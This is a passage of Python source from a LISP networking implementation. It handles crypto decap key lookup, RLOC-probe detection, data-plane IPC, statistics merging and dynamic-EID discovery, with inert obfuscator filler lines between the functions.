        struct.pack("H", 0) + packet[8:10] + struct.pack("H", 0) + \
        packet[12:20]

    header = lisp_ip_checksum(header)
    return(header + packet[20::])
if 77 - 77: I1ii11iIi11i . OoO0O00 / OoOoOO00 / O0
if 67 - 67: ooOoO0o % I11i % oO0o
if 74 - 74: II111iiii
if 44 - 44: Oo0Ooo + OoO0O00 + OoOoOO00 - I1IiiI
if 68 - 68: i11iIiiIii / OOooOOo . i1IIi . i11iIiiIii . I11i
if 56 - 56: iIii1I11I1II1 - II111iiii * i1IIi / Ii1I
if 65 - 65: OOooOOo / I1IiiI . OoooooooOO + I1IiiI + OoooooooOO + i11iIiiIii
if 20 - 20: I1IiiI + iII111i + O0 * O0
def lisp_get_crypto_decap_lookup_key(addr, port):
    """Find the decap crypto-key dictionary key for (addr, port).

    Tries 'addr:port' first, then bare 'addr'. Failing both, scans for an
    existing 'addr:<other-port>' entry (a NAT port change) and aliases its
    key state under the bare address before returning it. Returns None
    when no state exists for this RLOC at all.
    """
    addr_str = addr.print_address_no_iid() + ":" + str(port)
    if (addr_str in lisp_crypto_keys_by_rloc_decap): return(addr_str)

    addr_str = addr.print_address_no_iid()
    if (addr_str in lisp_crypto_keys_by_rloc_decap): return(addr_str)

    #
    # Same RLOC, different port: reuse its keys under the bare address.
    # (IPv6 addresses contain ':', so rejoin all but the last component.)
    #
    for key in lisp_crypto_keys_by_rloc_decap:
        parts = key.split(":")
        if (len(parts) == 1): continue
        base = parts[0] if len(parts) == 2 else ":".join(parts[0:-1])
        if (base == addr_str):
            keys = lisp_crypto_keys_by_rloc_decap[key]
            lisp_crypto_keys_by_rloc_decap[addr_str] = keys
            return(addr_str)

    return(None)
if 30 - 30: OOooOOo . iIii1I11I1II1 * ooOoO0o * OoooooooOO / I1IiiI
if 67 - 67: OoOoOO00 % iII111i . o0oOOo0O0Ooo / II111iiii * O0 / I1IiiI
if 20 - 20: oO0o * O0 - Ii1I + i11iIiiIii - OoOoOO00
if 18 - 18: I1ii11iIi11i . iII111i
if 31 - 31: I11i * o0oOOo0O0Ooo
if 17 - 17: Ii1I * iIii1I11I1II1
if 9 - 9: o0oOOo0O0Ooo - IiII
if 78 - 78: i11iIiiIii . o0oOOo0O0Ooo
if 72 - 72: Oo0Ooo % II111iiii + O0 * OoOoOO00 - OOooOOo + I1Ii111
if 23 - 23: I1IiiI - O0 - iII111i . II111iiii / oO0o
if 1 - 1: I11i . OOooOOo / oO0o % I11i * Oo0Ooo + Oo0Ooo
def lisp_build_crypto_decap_lookup_key(addr, port):
    """Decide whether decap key state is stored per-address or per-port.

    On an RTR: an RLOC we are probing is keyed by bare address; an RLOC
    known to be behind a NAT is keyed by 'addr:port'; anything else falls
    back to the bare address. On non-RTR nodes the 'addr:port' form is
    always used.
    """
    addr = addr.print_address_no_iid()
    addr_and_port = addr + ":" + str(port)

    if (lisp_i_am_rtr):
        if (addr in lisp_rloc_probe_list): return(addr)

        #
        # NATed xTR: its RLOC appears in the NAT state table, so key by
        # address *and* translated port.
        #
        for nat_info in lisp_nat_state_info.values():
            for nat in nat_info:
                if (addr == nat.address): return(addr_and_port)

        return(addr)
    return(addr_and_port)
if 24 - 24: Ii1I + i11iIiiIii * I1Ii111 - OoOoOO00 / Ii1I - OoOoOO00
if 69 - 69: I11i - I1IiiI . oO0o - OoooooooOO
if 33 - 33: o0oOOo0O0Ooo - o0oOOo0O0Ooo
if 55 - 55: OoooooooOO / IiII + i1IIi
if 54 - 54: ooOoO0o * Ii1I / Ii1I
if 15 - 15: oO0o * I1Ii111
if 11 - 11: Ii1I + o0oOOo0O0Ooo * OoooooooOO % iIii1I11I1II1
def lisp_set_ttl(lisp_socket, ttl):
    """Best-effort set of the IPv4 TTL socket option on 'lisp_socket'.

    Platforms without IP_TTL support just get a log line; the failure is
    deliberately swallowed.
    """
    try:
        lisp_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
    except:
        lprint("socket.setsockopt(IP_TTL) not supported")

    return
if 46 - 46: oO0o + OoOoOO00
if 17 - 17: Ii1I . Oo0Ooo - oO0o % OOooOOo
if 59 - 59: O0
if 75 - 75: o0oOOo0O0Ooo / OoooooooOO . I1ii11iIi11i * oO0o * I11i / OoooooooOO
if 17 - 17: Ii1I % I1ii11iIi11i + I11i
if 80 - 80: i1IIi . OoooooooOO % OoooooooOO . oO0o / OOooOOo
if 85 - 85: OOooOOo
def lisp_is_rloc_probe_request(lisp_type):
    """Return True when the one-byte LISP type field is a Map-Request
    with the probe bit set (0x12)."""
    type_byte = struct.unpack("B", lisp_type)[0]
    return(type_byte == 0x12)
if 80 - 80: ooOoO0o % O0 % I1ii11iIi11i + Oo0Ooo
if 82 - 82: oO0o / iIii1I11I1II1 % ooOoO0o . Ii1I / i1IIi - I1Ii111
if 15 - 15: I11i - OOooOOo . II111iiii . iIii1I11I1II1
if 93 - 93: I11i + o0oOOo0O0Ooo / OOooOOo + Ii1I % Oo0Ooo % I1ii11iIi11i
if 72 - 72: IiII / II111iiii
if 25 - 25: i1IIi + OoOoOO00 + oO0o + OoooooooOO
if 21 - 21: I1ii11iIi11i
def lisp_is_rloc_probe_reply(lisp_type):
    """Return True when the one-byte LISP type field is a Map-Reply
    with the probe bit set (0x28)."""
    type_byte = struct.unpack("B", lisp_type)[0]
    return(type_byte == 0x28)
if 60 - 60: i1IIi / OoO0O00 . Ii1I
if 16 - 16: i11iIiiIii + OoOoOO00 % Oo0Ooo + I1ii11iIi11i * Ii1I / I1Ii111
if 26 - 26: iII111i
if 31 - 31: iII111i
if 45 - 45: OoO0O00
if 55 - 55: iIii1I11I1II1 % iIii1I11I1II1 + I11i - ooOoO0o + I1IiiI * O0
if 47 - 47: ooOoO0o + iIii1I11I1II1 * OOooOOo . I1IiiI . o0oOOo0O0Ooo
if 49 - 49: Oo0Ooo . OoOoOO00 * OOooOOo
if 86 - 86: IiII * OOooOOo + Ii1I
if 62 - 62: I11i
if 86 - 86: Oo0Ooo % II111iiii + I1Ii111 / I1ii11iIi11i
if 15 - 15: I1IiiI / I1Ii111 % iII111i
if 57 - 57: I1Ii111 . iIii1I11I1II1 / Oo0Ooo / IiII / iII111i * OoOoOO00
if 35 - 35: i1IIi + I1Ii111 - ooOoO0o . I1ii11iIi11i + Oo0Ooo
if 43 - 43: oO0o . OoO0O00 * i1IIi
if 1 - 1: ooOoO0o / i1IIi
if 42 - 42: I1ii11iIi11i * ooOoO0o + OoOoOO00 % I1ii11iIi11i . IiII
if 75 - 75: OoO0O00 * i1IIi - OOooOOo % II111iiii % OoO0O00 - OoOoOO00
if 75 - 75: I11i * IiII * ooOoO0o
def lisp_is_rloc_probe(packet, rr):
    """Classify a pcap'ed IPv4 packet as an RLOC-probe and strip headers.

    'rr' selects what to accept: 0 = probe requests only, 1 = probe
    replies only, -1 = either. Returns [payload, source, port, ttl] for
    an accepted probe (payload starts after the IP+UDP headers, ttl is
    already decremented); [packet, None, None, None] when the packet is
    not a probe; [None, None, None, None] when it is our own probe
    (locally-sourced) and must be ignored.
    """
    is_udp = (struct.unpack("B", packet[9])[0] == 17)
    if (is_udp == False): return([packet, None, None, None])

    sport = struct.unpack("H", packet[20:22])[0]
    dport = struct.unpack("H", packet[22:24])[0]
    is_lisp_ctrl = (socket.htons(LISP_CTRL_PORT) in [sport, dport])
    if (is_lisp_ctrl == False): return([packet, None, None, None])

    if (rr == 0):
        probe = lisp_is_rloc_probe_request(packet[28])
        if (probe == False): return([packet, None, None, None])
    elif (rr == 1):
        probe = lisp_is_rloc_probe_reply(packet[28])
        if (probe == False): return([packet, None, None, None])
    elif (rr == -1):
        probe = lisp_is_rloc_probe_request(packet[28])
        if (probe == False):
            probe = lisp_is_rloc_probe_reply(packet[28])
            if (probe == False): return([packet, None, None, None])

    #
    # Ignore our own probes looping back through the capture.
    #
    source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
    source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])

    if (source.is_local()): return([None, None, None, None])

    source = source.print_address_no_iid()
    port = socket.ntohs(struct.unpack("H", packet[20:22])[0])
    ttl = struct.unpack("B", packet[8])[0] - 1
    packet = packet[28::]

    recv = bold("Receive(pcap)", False)
    from_str = bold("from " + source, False)
    packet_str = lisp_format_packet(packet)
    lprint("{} {} bytes {} {}, packet: {}".format(recv, len(packet),
        from_str, port, packet_str))

    return([packet, source, port, ttl])
if 85 - 85: I1ii11iIi11i - o0oOOo0O0Ooo % o0oOOo0O0Ooo % iII111i * OoOoOO00
if 50 - 50: I1Ii111 + I1Ii111 + I11i - OoOoOO00
if 65 - 65: oO0o / I11i + iII111i - I1ii11iIi11i
if 80 - 80: II111iiii . i11iIiiIii
if 66 - 66: ooOoO0o * iII111i * OOooOOo % OoO0O00 / I1ii11iIi11i
if 33 - 33: iIii1I11I1II1
if 52 - 52: iIii1I11I1II1 + O0
if 84 - 84: OOooOOo / iII111i . I1IiiI / O0 % OOooOOo . iII111i
if 32 - 32: OoO0O00 + OoO0O00 % o0oOOo0O0Ooo / O0
if 29 - 29: iII111i % I1Ii111
if 95 - 95: OOooOOo - ooOoO0o % i1IIi / O0 % I11i . IiII
def lisp_ipc_write_xtr_parameters(cp, dp):
    """Push xTR runtime parameters to the external data-plane.

    Sends an "xtr-parameters" JSON message over the data-plane IPC socket
    carrying the control-plane and data-plane logging flags plus whether
    this process runs as an RTR. No-op when the IPC socket is not open.
    """
    if (lisp_ipc_dp_socket == None): return

    ipc_message = {
        "type": "xtr-parameters",
        "control-plane-logging": cp,
        "data-plane-logging": dp,
        "rtr": lisp_i_am_rtr
    }
    lisp_write_to_dp_socket(ipc_message)
    return
if 90 - 90: IiII
if 38 - 38: i1IIi / ooOoO0o / I11i * I1ii11iIi11i / II111iiii . iIii1I11I1II1
if 52 - 52: I1ii11iIi11i % ooOoO0o * Ii1I * IiII + IiII / i11iIiiIii
if 51 - 51: iIii1I11I1II1 * o0oOOo0O0Ooo % o0oOOo0O0Ooo . Ii1I / OoooooooOO
if 23 - 23: oO0o * I1IiiI - oO0o - ooOoO0o . IiII / i11iIiiIii
if 53 - 53: Ii1I * Ii1I . OoOoOO00 . OOooOOo / I1ii11iIi11i % O0
if 98 - 98: OOooOOo
if 11 - 11: OOooOOo * iIii1I11I1II1 % IiII - I1IiiI . I11i
def lisp_external_data_plane():
    """Return True when an external data-plane is in use.

    True when either "ipc-data-plane = yes" appears in ./lisp.config or
    the LISP_RUN_LISP_XTR environment variable is set.
    """
    grep_command = 'egrep "ipc-data-plane = yes" ./lisp.config'
    config_says_ipc = (commands.getoutput(grep_command) != "")
    env_says_xtr = (os.getenv("LISP_RUN_LISP_XTR") != None)
    return (config_says_ipc or env_says_xtr)
if 75 - 75: II111iiii . O0 . I1Ii111 * O0 / OoooooooOO
if 60 - 60: OOooOOo - Oo0Ooo * OOooOOo / OoO0O00
if 55 - 55: I1ii11iIi11i * II111iiii * iIii1I11I1II1
if 38 - 38: iIii1I11I1II1 % I1ii11iIi11i . Ii1I + I1IiiI % i11iIiiIii - i11iIiiIii
if 62 - 62: I1Ii111 + I1IiiI
if 9 - 9: iIii1I11I1II1 / iIii1I11I1II1
if 24 - 24: OOooOOo . I1IiiI % i11iIiiIii
if 43 - 43: OoooooooOO . o0oOOo0O0Ooo - I1ii11iIi11i + OoO0O00 . I1Ii111 . iII111i
if 1 - 1: iII111i / OoO0O00 / OoOoOO00 * Oo0Ooo * OoooooooOO
if 59 - 59: iII111i
if 14 - 14: oO0o . IiII + iIii1I11I1II1 - i1IIi
if 46 - 46: i11iIiiIii * II111iiii / i11iIiiIii % i11iIiiIii * II111iiii + i11iIiiIii
if 87 - 87: Oo0Ooo + OoO0O00 / II111iiii * OoooooooOO
if 95 - 95: I1Ii111 * o0oOOo0O0Ooo + OoO0O00 % OoOoOO00 - ooOoO0o / OoOoOO00
def lisp_process_data_plane_restart(do_clear=False):
    """Resync a restarted external data-plane.

    Touches ./lisp.config (so the data-plane re-reads configuration) and
    writes the entire map-cache to the data-plane socket as one
    "entire-map-cache" message. When do_clear is True the entry list is
    left empty, which tells the data-plane to flush its cache.
    """
    os.system("touch ./lisp.config")

    ipc_message = {"type": "entire-map-cache", "entries": []}

    if (do_clear == False):
        entry_list = ipc_message["entries"]
        lisp_map_cache.walk_cache(lisp_ipc_walk_map_cache, entry_list)

    lisp_write_to_dp_socket(ipc_message)
    return
if 23 - 23: Oo0Ooo * IiII - I1Ii111 . OoooooooOO
if 78 - 78: OoOoOO00 - iIii1I11I1II1
if 20 - 20: i1IIi
if 72 - 72: ooOoO0o . II111iiii
if 32 - 32: I1Ii111 - oO0o + OoooooooOO . OoOoOO00 + i11iIiiIii / i1IIi
if 26 - 26: I1IiiI + OoooooooOO % OoOoOO00 . IiII - II111iiii . OoOoOO00
if 37 - 37: OoO0O00 % O0 + OoOoOO00 * I11i . Ii1I * OoO0O00
if 18 - 18: o0oOOo0O0Ooo / OOooOOo
if 28 - 28: O0 / Ii1I - oO0o % I1ii11iIi11i % O0 . OoO0O00
if 100 - 100: O0
if 19 - 19: Ii1I * iIii1I11I1II1 * Oo0Ooo - i11iIiiIii * i11iIiiIii - OOooOOo
if 88 - 88: O0 . iIii1I11I1II1 . I1ii11iIi11i
if 80 - 80: oO0o / i1IIi * iIii1I11I1II1
if 38 - 38: Ii1I
def lisp_process_data_plane_stats(msg, lisp_sockets, lisp_port):
    """Fold data-plane per-RLOC counters into the control-plane map-cache.

    msg is a "statistics" IPC dict with an "entries" array; each entry
    names an EID-prefix/instance-id and carries per-RLOC packet/byte
    counters. Counters are added to the matching map-cache RLOC stats.
    After each entry is processed, a Map-Request refresh is sent for
    unicast entries whose TTL has elapsed.

    Fix vs. original: the inner loops used `for msg in msg["entries"]`,
    shadowing the `msg` parameter (and a second shadow for each RLOC
    record); loop variables are now distinct. Behavior is unchanged.
    """
    if (msg.has_key("entries") == False):
        lprint("No 'entries' in stats IPC message")
        return

    if (type(msg["entries"]) != list):
        lprint("'entries' in stats IPC message must be an array")
        return

    for entry in msg["entries"]:
        if (entry.has_key("eid-prefix") == False):
            lprint("No 'eid-prefix' in stats IPC message")
            continue

        eid_str = entry["eid-prefix"]

        if (entry.has_key("instance-id") == False):
            lprint("No 'instance-id' in stats IPC message")
            continue

        iid = int(entry["instance-id"])

        #
        # Build lookup key and find the map-cache entry to update.
        #
        eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
        eid.store_prefix(eid_str)
        mc = lisp_map_cache_lookup(None, eid)
        if (mc == None):
            lprint("Map-cache entry for {} not found for stats update".format(eid_str))
            continue

        if (entry.has_key("rlocs") == False):
            lprint("No 'rlocs' in stats IPC message for {}".format(eid_str))
            continue

        if (type(entry["rlocs"]) != list):
            lprint("'rlocs' in stats IPC message must be an array")
            continue

        rloc_records = entry["rlocs"]

        #
        # Add reported counters to each matching RLOC of the entry.
        #
        for record in rloc_records:
            if (record.has_key("rloc") == False): continue

            rloc_str = record["rloc"]
            if (rloc_str == "no-address"): continue

            rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
            rloc.store_address(rloc_str)

            rloc_entry = mc.get_rloc(rloc)
            if (rloc_entry == None): continue

            #
            # Missing counters default to 0 so a sparse report is valid.
            #
            pc = 0 if record.has_key("packet-count") == False else record["packet-count"]

            bc = 0 if record.has_key("byte-count") == False else record["byte-count"]

            ts = 0 if record.has_key("seconds-last-packet") == False else record["seconds-last-packet"]

            rloc_entry.stats.packet_count += pc
            rloc_entry.stats.byte_count += bc
            rloc_entry.stats.last_increment = lisp_get_timestamp() - ts

            lprint("Update stats {}/{}/{}s for {} RLOC {}".format(pc, bc,
                ts, eid_str, rloc_str))

        #
        # Refresh unicast (group-less) entries whose TTL has elapsed.
        #
        if (mc.group.is_null() and mc.has_ttl_elapsed()):
            eid_str = green(mc.print_eid_tuple(), False)
            lprint("Refresh map-cache entry {}".format(eid_str))
            lisp_send_map_request(lisp_sockets, lisp_port, None, mc.eid, None)
    return
if 84 - 84: OoOoOO00
if 59 - 59: Ii1I / I1Ii111 + i11iIiiIii
if 20 - 20: O0 / I1Ii111 - OOooOOo % iIii1I11I1II1
if 89 - 89: O0 * OoOoOO00 . ooOoO0o
if 11 - 11: iIii1I11I1II1 * OoO0O00 . I1IiiI * OoOoOO00 / II111iiii
if 72 - 72: I11i
if 7 - 7: i1IIi - o0oOOo0O0Ooo - I1IiiI
if 62 - 62: OoOoOO00 * oO0o - I1IiiI / Ii1I
if 48 - 48: o0oOOo0O0Ooo % o0oOOo0O0Ooo - OoOoOO00
if 13 - 13: OoO0O00 - Ii1I . ooOoO0o / O0 * OoOoOO00
if 57 - 57: O0 + OoooooooOO % o0oOOo0O0Ooo / I1Ii111 / OOooOOo - OoOoOO00
if 48 - 48: o0oOOo0O0Ooo - II111iiii + OoOoOO00
if 54 - 54: II111iiii - OoO0O00 - o0oOOo0O0Ooo - O0 % I1Ii111
if 9 - 9: i1IIi % iII111i / Ii1I
if 83 - 83: oO0o
if 1 - 1: oO0o * iIii1I11I1II1 % iIii1I11I1II1 % iIii1I11I1II1 / oO0o + IiII
if 29 - 29: OoooooooOO
if 55 - 55: O0 - o0oOOo0O0Ooo % I1ii11iIi11i * I11i * oO0o
if 83 - 83: iIii1I11I1II1
if 92 - 92: OoO0O00 - iII111i
if 97 - 97: ooOoO0o / I11i . IiII + I1Ii111 . iIii1I11I1II1
if 24 - 24: ooOoO0o - oO0o % OoOoOO00 * Oo0Ooo
if 54 - 54: Ii1I - OoooooooOO % I1IiiI + oO0o
def lisp_process_data_plane_decap_stats(msg, lisp_ipc_socket):
    """Merge data-plane decapsulation counters into lisp_decap_stats.

    When running as an ITR, the message is forwarded over IPC to the
    lisp-etr process (which owns decap stats) and nothing is counted
    here. When running as an ETR, msg arrives as a JSON string and is
    parsed before the per-category counters are accumulated.
    """
    if (lisp_i_am_itr):
        lprint("Send decap-stats IPC message to lisp-etr process")
        forwarded = "stats%{}".format(json.dumps(msg))
        forwarded = lisp_command_ipc(forwarded, "lisp-itr")
        lisp_ipc(forwarded, lisp_ipc_socket, "lisp-etr")
        return

    ipc_tag = bold("IPC", False)
    lprint("Process decap-stats {} message: '{}'".format(ipc_tag, msg))

    if (lisp_i_am_etr): msg = json.loads(msg)

    categories = ["good-packets", "ICV-error", "checksum-error",
        "lisp-header-error", "no-decrypt-key", "bad-inner-version",
        "outer-header-error"]

    for category in categories:
        # Absent categories contribute 0 so partial reports are fine.
        pc = 0 if msg.has_key(category) == False else msg[category]["packet-count"]
        lisp_decap_stats[category].packet_count += pc

        bc = 0 if msg.has_key(category) == False else msg[category]["byte-count"]
        lisp_decap_stats[category].byte_count += bc

        ts = 0 if msg.has_key(category) == False else msg[category]["seconds-last-packet"]
        lisp_decap_stats[category].last_increment = lisp_get_timestamp() - ts
    return
if 34 - 34: I11i % Oo0Ooo . II111iiii - OoO0O00 - I1Ii111 + Oo0Ooo
if 71 - 71: O0 + OOooOOo % OoooooooOO
if 51 - 51: I1ii11iIi11i * o0oOOo0O0Ooo * I11i
if 27 - 27: OoOoOO00 % OoO0O00 * oO0o . II111iiii - i11iIiiIii
if 56 - 56: OOooOOo . IiII - OOooOOo / i11iIiiIii * I1ii11iIi11i
if 66 - 66: oO0o + ooOoO0o
if 1 - 1: ooOoO0o
if 61 - 61: o0oOOo0O0Ooo / OoooooooOO . I1ii11iIi11i + Oo0Ooo
if 75 - 75: Ii1I
if 79 - 79: i1IIi . I1ii11iIi11i * o0oOOo0O0Ooo / I11i . I11i / ooOoO0o
if 99 - 99: oO0o + I11i % i1IIi . iII111i
if 58 - 58: Oo0Ooo % i11iIiiIii . Oo0Ooo / Oo0Ooo - I1IiiI . Ii1I
if 65 - 65: OoO0O00
if 16 - 16: IiII % I1IiiI % iIii1I11I1II1 . I1IiiI . I1ii11iIi11i - IiII
if 6 - 6: I1Ii111 + OoO0O00 + O0 * OoOoOO00 . iIii1I11I1II1 . I1Ii111
if 93 - 93: ooOoO0o % iIii1I11I1II1 + I1ii11iIi11i
if 74 - 74: OoOoOO00 + I1ii11iIi11i
def lisp_process_punt(punt_socket, lisp_send_sockets, lisp_ephem_port):
    """Dispatch one punt IPC message received from the data-plane.

    Message types handled: "statistics", "decap-statistics", "restart",
    and "discovery". Discovery messages may trigger dynamic source-EID
    learning (ITR) and/or a rate-limited Map-Request for the destination
    EID when no map-cache entry exists.

    Fix vs. original: the dynamic-EID path called lisp_itr_discover_eid()
    with 4 arguments while its definition takes 5 required parameters
    (db, eid, input_interface, routed_interface, lisp_ipc_listen_socket),
    which raised TypeError at runtime; punt_socket is now passed as the
    IPC listen socket.
    """
    data, source = punt_socket.recvfrom(4000)

    msg = json.loads(data)
    if (type(msg) != dict):
        lprint("Invalid punt message from {}, not in JSON format".format(source))
        return

    punt = bold("Punt", False)
    lprint("{} message from '{}': '{}'".format(punt, source, msg))

    if (msg.has_key("type") == False):
        lprint("Punt IPC message has no 'type' key")
        return

    #
    # Non-discovery message types are handed off and we are done.
    #
    if (msg["type"] == "statistics"):
        lisp_process_data_plane_stats(msg, lisp_send_sockets, lisp_ephem_port)
        return

    if (msg["type"] == "decap-statistics"):
        lisp_process_data_plane_decap_stats(msg, punt_socket)
        return

    if (msg["type"] == "restart"):
        lisp_process_data_plane_restart()
        return

    if (msg["type"] != "discovery"):
        lprint("Punt IPC message has wrong format")
        return

    if (msg.has_key("interface") == False):
        lprint("Invalid punt message from {}, required keys missing".format(source))
        return

    #
    # Resolve instance-id: from the message when no interface is named,
    # otherwise from the interface's configuration.
    #
    device = msg["interface"]
    if (device == ""):
        iid = int(msg["instance-id"])
        if (iid == -1): return
    else:
        iid = lisp_get_interface_instance_id(device, None)

    seid = None
    if (msg.has_key("source-eid")):
        eid_str = msg["source-eid"]
        seid = lisp_address(LISP_AFI_NONE, eid_str, 0, iid)
        if (seid.is_null()):
            lprint("Invalid source-EID format '{}'".format(eid_str))
            return

    deid = None
    if (msg.has_key("dest-eid")):
        eid_str = msg["dest-eid"]
        deid = lisp_address(LISP_AFI_NONE, eid_str, 0, iid)
        if (deid.is_null()):
            lprint("Invalid dest-EID format '{}'".format(eid_str))
            return

    #
    # Dynamic source-EID discovery: only for EIDs covered by a database
    # mapping configured for dynamic-EIDs, and only in the ITR process.
    #
    if (seid):
        e = green(seid.print_address(), False)
        db = lisp_db_for_lookups.lookup_cache(seid, False)
        if (db != None):
            if (db.dynamic_eid_configured()):
                routed = lisp_allow_dynamic_eid(device, seid)
                if (routed != None and lisp_i_am_itr):
                    lisp_itr_discover_eid(db, seid, device, routed,
                        punt_socket)
                else:
                    lprint(("Disallow dynamic source-EID {} " + "on interface {}").format(e, device))
        else:
            lprint("Punt from non-EID source {}".format(e))

    #
    # Destination lookup miss (or send-map-request action): send a
    # rate-limited Map-Request.
    #
    if (deid):
        mc = lisp_map_cache_lookup(seid, deid)
        if (mc == None or mc.action == LISP_SEND_MAP_REQUEST_ACTION):
            if (lisp_rate_limit_map_request(seid, deid)): return
            lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
                seid, deid, None)
        else:
            e = green(deid.print_address(), False)
            lprint("Map-cache entry for {} already exists".format(e))
    return
if 1 - 1: II111iiii / iII111i
if 83 - 83: OoO0O00 / iII111i
if 59 - 59: I1Ii111 % OOooOOo . I1IiiI + I1ii11iIi11i % oO0o
if 96 - 96: OoO0O00
if 53 - 53: oO0o + OoO0O00
if 58 - 58: iIii1I11I1II1 + OoOoOO00
if 65 - 65: iII111i % Oo0Ooo * iIii1I11I1II1 + I1IiiI + II111iiii
def lisp_ipc_map_cache_entry(mc, jdata):
    """Walk-cache callback: append one map-cache entry's IPC dict to jdata.

    Returns [True, jdata] so the walk continues.
    """
    record = lisp_write_ipc_map_cache(True, mc, dont_send=True)
    jdata.append(record)
    return ([True, jdata])
if 72 - 72: OoOoOO00 . OoooooooOO - OOooOOo
if 15 - 15: OoOoOO00
if 13 - 13: I1ii11iIi11i - OOooOOo - i11iIiiIii / IiII
if 65 - 65: IiII
if 76 - 76: I1Ii111 % I1ii11iIi11i + ooOoO0o / I1IiiI
if 59 - 59: OOooOOo - o0oOOo0O0Ooo - o0oOOo0O0Ooo % I1IiiI
if 55 - 55: o0oOOo0O0Ooo % I1ii11iIi11i - IiII + OoooooooOO
if 44 - 44: iII111i * I1Ii111 - I1IiiI % i1IIi
def lisp_ipc_walk_map_cache(mc, jdata):
    """Walk-cache callback that also descends (S,G) source caches.

    A group-less entry is serialized directly; a group entry with a
    source_cache recurses into it with lisp_ipc_map_cache_entry.
    Returns [True, jdata] so the outer walk continues.
    """
    if (mc.group.is_null()): return (lisp_ipc_map_cache_entry(mc, jdata))

    if (mc.source_cache == None): return ([True, jdata])

    # (S,G) entry: serialize every source under this group.
    jdata = mc.source_cache.walk_cache(lisp_ipc_map_cache_entry, jdata)
    return ([True, jdata])
if 51 - 51: Ii1I * Ii1I + iII111i * oO0o / OOooOOo - ooOoO0o
if 16 - 16: I1Ii111 + O0 - O0 * iIii1I11I1II1 / iII111i
if 4 - 4: iII111i
if 75 - 75: I1IiiI * IiII % OoO0O00 - ooOoO0o * iII111i
if 32 - 32: iII111i
if 59 - 59: OoOoOO00 - I1Ii111
if 34 - 34: ooOoO0o . OoooooooOO / ooOoO0o + OoooooooOO
def lisp_itr_discover_eid(db, eid, input_interface, routed_interface,
    lisp_ipc_listen_socket):
    """Record a newly seen dynamic-EID and tell the lisp-etr process.

    When the EID is already known, only its last-packet timestamp is
    refreshed. Otherwise a lisp_dynamic_eid record is created and stored
    in db.dynamic_eids, and a "learn" IPC message is sent to lisp-etr.
    """
    eid_str = eid.print_address()

    if (db.dynamic_eids.has_key(eid_str)):
        # Already discovered -- just refresh activity timestamp.
        db.dynamic_eids[eid_str].last_packet = lisp_get_timestamp()
        return

    dyn_eid = lisp_dynamic_eid()
    dyn_eid.dynamic_eid.copy_address(eid)
    dyn_eid.interface = routed_interface
    dyn_eid.last_packet = lisp_get_timestamp()
    dyn_eid.get_timeout(routed_interface)
    db.dynamic_eids[eid_str] = dyn_eid

    routed_str = ""
    if (input_interface != routed_interface):
        routed_str = ", routed-interface " + routed_interface

    banner = green(eid_str, False) + bold(" discovered", False)
    lprint("Dynamic-EID {} on interface {}{}, timeout {}".format(banner,
        input_interface, routed_str, dyn_eid.timeout))

    #
    # Tell the ETR so it can register the dynamic-EID.
    #
    learn_ipc = "learn%{}%{}".format(eid_str, routed_interface)
    learn_ipc = lisp_command_ipc(learn_ipc, "lisp-itr")
    lisp_ipc(learn_ipc, lisp_ipc_listen_socket, "lisp-etr")
    return
if 7 - 7: I1Ii111 / OoooooooOO % O0 - I1ii11iIi11i
if 49 - 49: OoooooooOO . I1ii11iIi11i / OoooooooOO * oO0o
if 81 - 81: I1ii11iIi11i . ooOoO0o + I1ii11iIi11i
if 84 - 84: OoooooooOO
if 95 - 95: o0oOOo0O0Ooo
if 22 - 22: ooOoO0o / o0oOOo0O0Ooo - OoooooooOO / Oo0Ooo - I1Ii111 / OOooOOo
if 41 - 41: oO0o . II111iiii
if 47 - 47: I1ii11iIi11i
if 5 - 5: Oo0Ooo
if 23 - 23: i11iIiiIii / I11i + i1IIi % I1Ii111
if 100 - 100: Oo0Ooo
if 13 - 13: I1IiiI + ooOoO0o * II111iiii
if 32 - 32: iIii1I11I1II1 + O0 + i1IIi
def lisp_retry_decap_keys(addr_str, packet, iv, packet_icv):
    """Try other stored decap crypto keys for an RLOC after an ICV miss.

    Scans lisp_crypto_keys_by_rloc_decap for other entries whose key
    string contains addr_str (i.e. addr:port variants of the same RLOC),
    tests each candidate's ICV against the packet, and on the first match
    installs that entry as the decap key for addr_str. Disabled unless
    lisp_search_decap_keys is set; skipped for keys containing ":".
    """
    if (lisp_search_decap_keys == False): return

    # Keys containing ":" (port-qualified / IPv6 forms) are not retried.
    if (addr_str.find(":") != -1): return

    current_entry = lisp_crypto_keys_by_rloc_decap[addr_str]

    for key_str in lisp_crypto_keys_by_rloc_decap:
        #
        # Consider only other entries for the same RLOC address.
        #
        if (key_str.find(addr_str) == -1): continue
        if (key_str == addr_str): continue

        candidate = lisp_crypto_keys_by_rloc_decap[key_str]
        if (candidate == current_entry): continue

        #
        # Validate candidate key by recomputing the packet ICV.
        #
        crypto_key = candidate[1]
        if (packet_icv != crypto_key.do_icv(packet, iv)):
            lprint("Test ICV with key {} failed".format(red(key_str, False)))
            continue

        lprint("Changing decap crypto key to {}".format(red(key_str, False)))
        lisp_crypto_keys_by_rloc_decap[addr_str] = candidate
    return
if 78 - 78: I11i
if 32 - 32: II111iiii / II111iiii + o0oOOo0O0Ooo + OoooooooOO
if 34 - 34: i11iIiiIii + iIii1I11I1II1 - i11iIiiIii * o0oOOo0O0Ooo - iII111i
if 87 - 87: OOooOOo * OoO0O00
if 61 - 61: iII111i - II111iiii . I1Ii111 % II111iiii / I11i
if 86 - 86: II111iiii
if 94 - 94: o0oOOo0O0Ooo % Ii1I * Ii1I % Oo0Ooo / I1ii11iIi11i
if 40 - 40: Oo0Ooo . II111iiii / II111iiii - i1IIi
def lisp_decent_pull_xtr_configured():
    """Return True when LISP-Decent pull mode is configured (non-zero
    modulus and a DNS suffix present)."""
    configured = (lisp_decent_modulus != 0 and lisp_decent_dns_suffix != None)
    return (configured)
if 91 - 91: Ii1I
if 45 - 45: I1ii11iIi11i + Oo0Ooo
if 72 - 72: I1ii11iIi11i
if 5 - 5: i1IIi
if 31 - 31: iII111i - OoooooooOO + oO0o / OoooooooOO + I1ii11iIi11i
if 93 - 93: o0oOOo0O0Ooo * I1ii11iIi11i % I1IiiI * ooOoO0o
if 37 - 37: OoO0O00 * OoooooooOO / oO0o * I11i * I1ii11iIi11i
